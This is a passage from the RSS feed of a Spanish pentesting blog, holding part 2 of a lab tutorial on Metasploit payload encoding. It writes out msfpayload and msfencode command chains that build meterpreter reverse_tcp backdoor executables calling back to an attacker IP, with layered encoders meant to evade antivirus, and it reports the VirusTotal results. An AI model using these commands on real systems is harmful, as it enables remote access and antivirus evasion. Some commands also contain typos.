&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=TJu4hCPJXZQ:7gIjvjmdB_A:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=TJu4hCPJXZQ:7gIjvjmdB_A:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=TJu4hCPJXZQ:7gIjvjmdB_A:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=TJu4hCPJXZQ:7gIjvjmdB_A:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=TJu4hCPJXZQ:7gIjvjmdB_A:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=TJu4hCPJXZQ:7gIjvjmdB_A:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=TJu4hCPJXZQ:7gIjvjmdB_A:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=TJu4hCPJXZQ:7gIjvjmdB_A:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=TJu4hCPJXZQ:7gIjvjmdB_A:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=TJu4hCPJXZQ:7gIjvjmdB_A:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/TJu4hCPJXZQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/TJu4hCPJXZQ/Metasploit-Encoding-payload3.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-aMCzQV4Y05k/UUx8D4UNSmI/AAAAAAAAEOY/nb7dxpeNMiE/s72-c/MSFPayload_parte3.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload3.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-3462189025399229320</guid><pubDate>Fri, 22 Mar 2013 09:40:00 +0000</pubDate><atom:updated>2013-03-23T19:03:13.624+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">PAYLOAD</category><category domain="http://www.blogger.com/atom/ns#">Pentester</category><category domain="http://www.blogger.com/atom/ns#">ENCODE</category><category domain="http://www.blogger.com/atom/ns#">Parte 2</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">MSFP</category><title>Metasploit: de ENCODING y PAYLOAD va la cosa (II)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/--P9jT_ZU8f8/UUwmjPXf1TI/AAAAAAAAEMI/ahI4YbIloX4/s1600/MSFPayload_parte2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/--P9jT_ZU8f8/UUwmjPXf1TI/AAAAAAAAEMI/ahI4YbIloX4/s1600/MSFPayload_parte2.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En la &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" target="_blank"&gt;primera parte&lt;/a&gt;, empezamos a trabajar con el comando "&lt;b&gt;msfpayload&lt;/b&gt;" del framework de metasploit, y una vez que se&amp;nbsp;había&amp;nbsp;generado un PAYLOAD ejecutable para plataformas Windows, se&amp;nbsp;subió&amp;nbsp;a &lt;a href="http://www.virustotal.com/"&gt;virustotal.com&lt;/a&gt; para comprobar la detección de este tipo de archivos por los sistema antivirus, y resulto, que era detectado por la mayoría de los motores de detección de los principales antivirus del mercado.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En el artículo de hoy, vamos a ver las opciones de las que disponemos para &lt;u&gt;aplicar técnicas de evasión&lt;/u&gt; de detección en los sistema antivirus, se realizarán varias pruebas ... &lt;b&gt;¿Conseguiremos evadir a los sistema antivirus?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;span style="background-color: orange;"&gt;&lt;span style="border: none; color: #3a3a3a; font-family: Arial, sans-serif; font-size: xx-small; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&lt;b&gt;INDICE:&lt;/b&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;Parte 1&lt;/a&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;|&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html" style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;" target="_blank"&gt;Parte 2&lt;/a&gt;&lt;span style="border: none; color: white; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload3.html" target="_blank"&gt;Parte 3&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="border: none; color: white; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Ejemplos de USO (segunda parte)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Recordamos que en el laboratorio (ST2Labs) disponemos de dos máquinas virtuales, la primera tiene Kali Linux y la segunda Windows XP SP3.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-kDEryundpz0/UUrrBdHCA9I/AAAAAAAAEKE/pnlUxlV_i-g/s1600/ST2Labs_vmware.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="143" src="http://2.bp.blogspot.com/-kDEryundpz0/UUrrBdHCA9I/AAAAAAAAEKE/pnlUxlV_i-g/s400/ST2Labs_vmware.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;ST2Labs - Laboratorio de Seguridad para Todos&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;u&gt;Ejemplo 2&lt;/u&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
Aprovechando que en el &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" target="_blank"&gt;Ejemplo 1&lt;/a&gt;, se había generado un backdoor del tipo meterpreter preparado para realizar una conexión remota con el equipo atacante (reverse_tcp), se va a partir de ese punto para comenzar a aplicar las técnicas de evasión, o lo que es lo mismo, técnicas de ENCODING.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Recordatorio:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;root@ST2Labs&lt;/b&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;&amp;gt; msfpayload windows/patchupmeterpreter/reverse_tcp EXITFUNC=seh LHOST=192.168.2.105 X &amp;gt; backdoor1.exe&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si recordamos de la &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" target="_blank"&gt;primera parte&lt;/a&gt;, el comando &lt;b&gt;msfencode&lt;/b&gt; nos permite aplicar ENCODING a nuestro PAYLOAD para tratar de evitar la detección de los sistema antivirus, ¿cómo se consigue esto?.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 1&lt;/b&gt;: Lo primero es conocer los recursos de los cuáles disponemos:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;"&gt;root@ST2Labs&amp;nbsp;&lt;/b&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;"&gt;&amp;gt; msfendode&lt;/span&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;"&gt;&amp;nbsp;-l&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Bi1n2bmhCGI/UUwbGOzBuzI/AAAAAAAAELg/y1spwa614_o/s1600/MSF_encode-4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="474" src="http://1.bp.blogspot.com/-Bi1n2bmhCGI/UUwbGOzBuzI/AAAAAAAAELg/y1spwa614_o/s640/MSF_encode-4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfencode -l [Listar los encoders disponibles]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hay que tener en cuenta, que para aplicar encoding al PAYLOAD se necesita que éste se encuentre en el formato RAW (en bruto) para lo cuál se tiene que indicar el formato a la hora de generar el PAYLOAD.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 2&lt;/b&gt;: Crear un PAYLOAD en formato RAW para que msfencode pueda trabajar con él.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para ello se tiene dos formas de hacer, la primera es generar un fichero RAW e indicar a msfencode que utilice dicho fichero para generar el nuevo ejecutable (EXE). La segunda manera, más sencilla, es aprovechar la capacidad que tiene Linux de concatenar comandos, donde la salida de uno es la entrada del siguiente, veamos como se realiza con un ejemplo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;root@ST2Labs&lt;/b&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;&amp;gt; msfpayload windows/patchupmeterpreter/reverse_tcp LHOST=192.168.2.105 R | msfencode -e x86/shikata_ga_nai -c 10 -b '\x00" -t exe -o backdoor2.exe&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-MMR3flhCdgQ/UUwc3w2onxI/AAAAAAAAELo/Usqv_UOU5do/s1600/MSF_encode-5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="274" src="http://2.bp.blogspot.com/-MMR3flhCdgQ/UUwc3w2onxI/AAAAAAAAELo/Usqv_UOU5do/s640/MSF_encode-5.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;msfencode [Técnica de encodigo x86/shikata_ga_nai]&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Si se observa la imagen anterior, se puede apreciar que:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;Se ha añadido la letra R, significa que el PAYLOAD utilice el formato RAW (ver msfpayload -h)&lt;/li&gt;
&lt;li&gt;Se ha utilizado la técnica x86/shikata_ga_nai por ser la técnica que ofrece el mejor resultado, con 10 iteraciones.&lt;/li&gt;
&lt;li&gt;Además se ha indicado que evite la utilización de los caracteres '\x00' en la generación del ejecutable, que son comunes en los shellcode.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 3&lt;/b&gt;: Comprobar si los Sistemas Antivirus detectan el ejecutable generado, para ello lo subimos a Virtustotal y el resultado es:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-8cu6LLTKthI/UUwdzn6X7NI/AAAAAAAAELw/2sj3V_7OmHY/s1600/MSF_encode-5-vt1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-8cu6LLTKthI/UUwdzn6X7NI/AAAAAAAAELw/2sj3V_7OmHY/s1600/MSF_encode-5-vt1.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Detección con Virustotal.es&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;¿Qué hacemos ahora?&lt;/b&gt; Nuestro primer intento no ha tenido éxito, lo detecta&amp;nbsp;prácticamente&amp;nbsp;todos los motores de antivirus, en particular los principales y más utilizados sistema de antivirus; Esto solo significa que hay que seguir trabajando. Y que mejor que hacerlo con más ejemplos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&amp;gt;&amp;gt; Paso 4&lt;/b&gt;: Aplicar varias capaz de encoding en cascada para generar el ejecutable final.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A continuación voy a poner los comandos que he utilizado, pero omitiré algunos pasos obvios del proceso para evitar caer en un&amp;nbsp;bucle&amp;nbsp;repetitivo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;root@ST2Labs&lt;/b&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;&amp;gt; msfpayload windows/patchupmeterpreter/reverse_tcp LHOST=192.168.2.105 R | msfencode -e php/base64 -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 10 -b '\x00" -t exe -o backdoor3.exe&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
El archivo (backdoor3.exe) sigue siendo detectado por la mayoría de los motores de Antivirus, vamos a intentar una vez más pero probando otras combinaciones y añadiendo más técnicas de evasión, tal que así:&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;root@ST2Labs&lt;/b&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;&amp;gt; msfpayload windows/patchupmeterpreter/reverse_tcp LHOST=192.168.2.105 R | msfencode -e php/base64 -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e &amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;x86/shikata_ga_nai -c 5&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #eeeeee; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px;"&gt;-b '\xff" -t raw | msfencode -e x86/alpha_mixed -c 1 -t exe -o backdoor4.exe&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;u&gt;Nota&lt;/u&gt;: si durante el proceso en alguna de las iteraciones obtenemos un error "bad character" se debe a la restricción impuesta de no utilizar cierto tipo de caracteres, por lo que deberemos de eliminar dicho&amp;nbsp;parámetro, cambiar de el tipo de caracteres , y si tras varias pruebas el error persiste, se puede evitar disminuyendo el número de iteraciones.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
Subimos el archivo (backdoor4.exe) a virustotal y el resultado es:&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-JJThKDYuaDg/UUwjDS5G2lI/AAAAAAAAEMA/oRjH8hctjF8/s1600/MSF_encode-5-vt2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-JJThKDYuaDg/UUwjDS5G2lI/AAAAAAAAEMA/oRjH8hctjF8/s1600/MSF_encode-5-vt2.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Resultados de virustotal para backdoor4.exe&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b style="font-weight: bold;"&gt;¿Cómo?&lt;/b&gt; Esta claro que el problema no esta en el tipo de encoding que se esta utilizando, a las pruebas me remito, el problema radica en el tipo de PAYLOAD que se esta utilizando y quizás en la generación del ejecutable propiamente dicho.&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;En el próximo artículo&lt;/b&gt;, utilizaré el comando &lt;b&gt;msfvenom&lt;/b&gt;, este comando unifica msfpayload y msfencode, &amp;nbsp;para que sea más sencillo, y además trabajaré con unos ejemplos donde se utilizara otro tipo de PAYLOAD y algo más, verificando que se consiguen mejores resultados en las tarea de evadir el sistema antivirus.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div style="background-color: white; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: start;"&gt;
&lt;span style="border: none; font-size: xx-small; list-style: none; margin: 0px; outline: none; padding: 0px;"&gt;&amp;gt;ST2Labs&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; color: #3a3a3a; font-family: Arial, sans-serif; font-size: 12px; line-height: 18px; text-align: start;"&gt;
#Pentesting #Rulez&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-S1Nt6dDSSCI/UUsSlA9bZcI/AAAAAAAAELU/rKRBbonz9as/s1600/ST2Labs_botton_head.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-S1Nt6dDSSCI/UUsSlA9bZcI/AAAAAAAAELU/rKRBbonz9as/s1600/ST2Labs_botton_head.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=Fgmc8P5QTEc:_S1S2390wF8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=Fgmc8P5QTEc:_S1S2390wF8:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=Fgmc8P5QTEc:_S1S2390wF8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=Fgmc8P5QTEc:_S1S2390wF8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=Fgmc8P5QTEc:_S1S2390wF8:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=Fgmc8P5QTEc:_S1S2390wF8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=Fgmc8P5QTEc:_S1S2390wF8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=Fgmc8P5QTEc:_S1S2390wF8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=Fgmc8P5QTEc:_S1S2390wF8:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=Fgmc8P5QTEc:_S1S2390wF8:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/Fgmc8P5QTEc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/Fgmc8P5QTEc/Metasploit-Encoding-payload2.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/--P9jT_ZU8f8/UUwmjPXf1TI/AAAAAAAAEMI/ahI4YbIloX4/s72-c/MSFPayload_parte2.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-1767407056273775075</guid><pubDate>Thu, 21 Mar 2013 14:02:00 +0000</pubDate><atom:updated>2013-03-23T19:03:29.417+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">PAYLOAD</category><category domain="http://www.blogger.com/atom/ns#">Pentester</category><category domain="http://www.blogger.com/atom/ns#">ENCODE</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">MSFP</category><category 